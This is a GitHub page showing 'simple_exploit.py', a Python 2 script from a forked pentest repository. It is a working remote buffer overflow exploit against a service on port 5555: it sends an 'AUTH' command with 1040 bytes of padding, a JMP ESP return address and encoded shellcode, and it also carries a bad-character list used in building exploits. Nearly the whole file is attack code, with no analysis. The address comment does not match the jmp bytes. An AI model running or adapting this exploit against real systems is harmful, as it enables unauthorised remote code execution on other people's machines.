forked from jivoi/pentest
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathsimple_exploit.py
executable file
·68 lines (62 loc) · 2.96 KB
/
simple_exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
#!/usr/bin/python
import time, struct, sys
import socket as so
try:
server = sys.argv[1]
port = 5555
except IndexError:
print "[+] Usage %s host" % sys.argv[0]
sys.exit()
payload =(
"\xba\xb0\x41\x05\xbb\x40\x98\xb4\x90\x30\xf5\x1d\x1c\x24\x99"+
"\x92\xdb\xc4\xd9\x74\x24\xf4\x5e\x33\xc9\xb1\x47\xbb\x96\x70"+
"\x05\x35\x83\xc6\x04\x31\x5e\x14\x03\x5e\x82\x92\xf0\xc9\x42"+
"\xd0\xfb\x31\x92\xb5\x72\xd4\xa3\xf5\xe1\x9c\x93\xc5\x62\xf0"+
"\x1f\xad\x27\xe1\x94\xc3\xef\x06\x1d\x69\xd6\x29\x9e\xc2\x2a"+
"\x2b\x1c\x19\x7f\x8b\x1d\xd2\x72\xca\x5a\x0f\x7e\x9e\x33\x5b"+
"\x2d\x0f\x30\x11\xee\xa4\x0a\xb7\x76\x58\xda\xb6\x57\xcf\x51"+
"\xe1\x77\xf1\xb6\x99\x31\xe9\xdb\xa4\x88\x82\x2f\x52\x0b\x43"+
"\x7e\x9b\xa0\xaa\x4f\x6e\xb8\xeb\x77\x91\xcf\x05\x84\x2c\xc8"+
"\xd1\xf7\xea\x5d\xc2\x5f\x78\xc5\x2e\x5e\xad\x90\xa5\x6c\x1a"+
"\xd6\xe2\x70\x9d\x3b\x99\x8c\x16\xba\x4e\x05\x6c\x99\x4a\x4e"+
"\x36\x80\xcb\x2a\x99\xbd\x0c\x95\x46\x18\x46\x3b\x92\x11\x05"+
"\x53\x57\x18\xb6\xa3\xff\x2b\xc5\x91\xa0\x87\x41\x99\x29\x0e"+
"\x95\xde\x03\xf6\x09\x21\xac\x07\x03\xe5\xf8\x57\x3b\xcc\x80"+
"\x33\xbb\xf1\x54\x93\xeb\x5d\x07\x54\x5c\x1d\xf7\x3c\xb6\x92"+
"\x28\x5c\xb9\x79\x41\xf7\x43\xe9\xae\xa0\x40\x9f\x46\xb3\x58"+
"\x5e\x2c\x3a\xbe\x0a\x42\x6b\x68\xa2\xfb\x36\xe2\x53\x03\xed"+
"\x8e\x53\x8f\x02\x6e\x1d\x78\x6e\x7c\xc9\x88\x25\xde\x5f\x96"+
"\x93\x75\x5f\x02\x18\xdc\x08\xba\x22\x39\x7e\x65\xdc\x6c\xf5"+
"\xac\x48\xcf\x61\xd1\x9c\xcf\x71\x87\xf6\xcf\x19\x7f\xa3\x83"+
"\x3c\x80\x7e\xb0\xed\x15\x81\xe1\x42\xbd\xe9\x0f\xbd\x89\xb5"+
"\xf0\xe8\x0b\x89\x26\xd4\x79\xe3\xfa")
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
#76E4FE96 FFE4 JMP ESP
jmp = "\xA0\xFE\xE4\x76"
req1 = "AUTH " + "\x41"*1040 + jmp + payload + "\x43"*(1450-1040-4-308-16)
s = so.socket(so.AF_INET, so.SOCK_STREAM)
try:
s.connect((server, port))
print repr(s.recv(1024))
s.send(req1)
print repr(s.recv(1024))
except:
print "[!] connection refused, check debugger"
s.close()